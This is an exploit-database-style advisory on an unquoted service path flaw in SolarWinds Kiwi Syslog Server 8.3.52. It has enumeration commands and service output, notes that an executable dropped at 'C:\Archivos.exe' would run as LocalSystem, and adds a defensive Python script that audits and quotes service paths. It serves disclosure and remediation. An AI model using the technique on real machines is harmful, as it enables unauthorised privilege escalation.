SolarWinds Kiwi Syslog Server 8.3.52 Unquoted Service Path

2019.11.10
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path
# Date: 2019-11-08
# Exploit Author: Carlos A Garcia R
# Vendor Homepage: https://www.kiwisyslog.com/
# Software Link: https://www.kiwisyslog.com/downloads
# Version: 8.3.52
# Tested on: Windows XP Professional Service Pack 3

# Description:
# SolarWinds Kiwi Syslog Server 8.3.52 is affordable software for managing syslog messages, SNMP traps, and Windows event logs.

# PoC:

# C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Kiwi Syslog Server    Kiwi Syslog Server    C:\Archivos de programa\Syslogd\Syslogd_Service.exe    Auto

# C:\>sc qc "Kiwi Syslog Server"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: Kiwi Syslog Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Archivos de programa\Syslogd\Syslogd_Service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Kiwi Syslog Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit

Because the BINARY_PATH_NAME listed above contains spaces and is not enclosed in quotes, an executable named "Archivos.exe" could be placed in "C:\", and it would be executed as the Local System user the next time the service was restarted.
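For auditing and remediation, the following added example (not part of the original advisory or of any SolarWinds code) parses `sc qc` output, lists the file locations that Windows would try before the intended service binary, and produces the quoted value that removes the ambiguity. The function names are hypothetical, the sample input is constructed from the fields quoted above, and treating the first ".exe" as the end of the executable is an assumption.

```python
import re

# Constructed sample: the `sc qc` fields quoted in the advisory above.
SC_QC_OUTPUT = r"""
SERVICE_NAME: Kiwi Syslog Server
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Archivos de programa\Syslogd\Syslogd_Service.exe
        SERVICE_START_NAME : LocalSystem
"""

def binary_path(sc_qc_text):
    """Return the raw BINARY_PATH_NAME value from `sc qc` output, or None."""
    m = re.search(r"^[ \t]*BINARY_PATH_NAME[ \t]*:[ \t]*(.+?)[ \t]*$", sc_qc_text, re.M)
    return m.group(1) if m else None

def split_exe(path):
    """Split an unquoted command line into (executable, arguments).

    Assumption: the executable ends at the first ".exe"; the rest is arguments.
    """
    m = re.match(r"(.*?\.exe)(?=\s|$)(.*)", path, re.I)
    return (m.group(1), m.group(2)) if m else (path, "")

def earlier_candidates(path):
    """Files Windows would try to run before the intended binary."""
    if path.startswith('"'):
        return []  # a quoted path is unambiguous
    exe, _ = split_exe(path)
    # At every space inside the executable path, the loader cuts the string,
    # appends ".exe" and tries that file first.
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]

def quoted_fix(path):
    """Corrected value, e.g. for: sc config "<service>" binPath= "<escaped value>"."""
    if path.startswith('"'):
        return path
    exe, args = split_exe(path)
    return f'"{exe}"{args}'

if __name__ == "__main__":
    path = binary_path(SC_QC_OUTPUT)
    for candidate in earlier_candidates(path):
        print("must not exist or be creatable by non-admins:", candidate)
    print("quoted BINARY_PATH_NAME:", quoted_fix(path))
```

Each reported location should be checked for existing files and for write permissions granted to unprivileged users; quoting the service path removes the ambiguity regardless of those permissions.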

